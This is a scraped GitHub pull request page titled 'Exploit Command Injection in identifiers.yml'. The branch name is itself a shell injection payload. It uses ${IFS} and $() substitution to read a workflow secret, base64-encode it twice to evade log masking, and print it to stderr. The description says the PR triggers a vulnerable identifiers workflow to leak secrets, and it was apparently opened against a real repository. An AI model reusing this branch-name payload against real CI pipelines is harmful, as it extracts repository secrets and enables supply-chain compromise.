Skip to content

Exploit Command Injection in identifiers.yml#1

Open
radeeshovashsain wants to merge 1 commit into
elcolloff:masterfrom
radeeshovashsain:exploit-$(echo${IFS}GARALT_LEAKED_TOKEN=$(echo${IFS}$GARALT_SECRET|base64|base64)>&2)
Open

Exploit Command Injection in identifiers.yml#1
radeeshovashsain wants to merge 1 commit into
elcolloff:masterfrom
radeeshovashsain:exploit-$(echo${IFS}GARALT_LEAKED_TOKEN=$(echo${IFS}$GARALT_SECRET|base64|base64)>&2)

Conversation

@radeeshovashsain

Copy link
Copy Markdown

This PR triggers the vulnerable identifiers workflow with a malicious branch name to demonstrate command injection and secret leakage.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant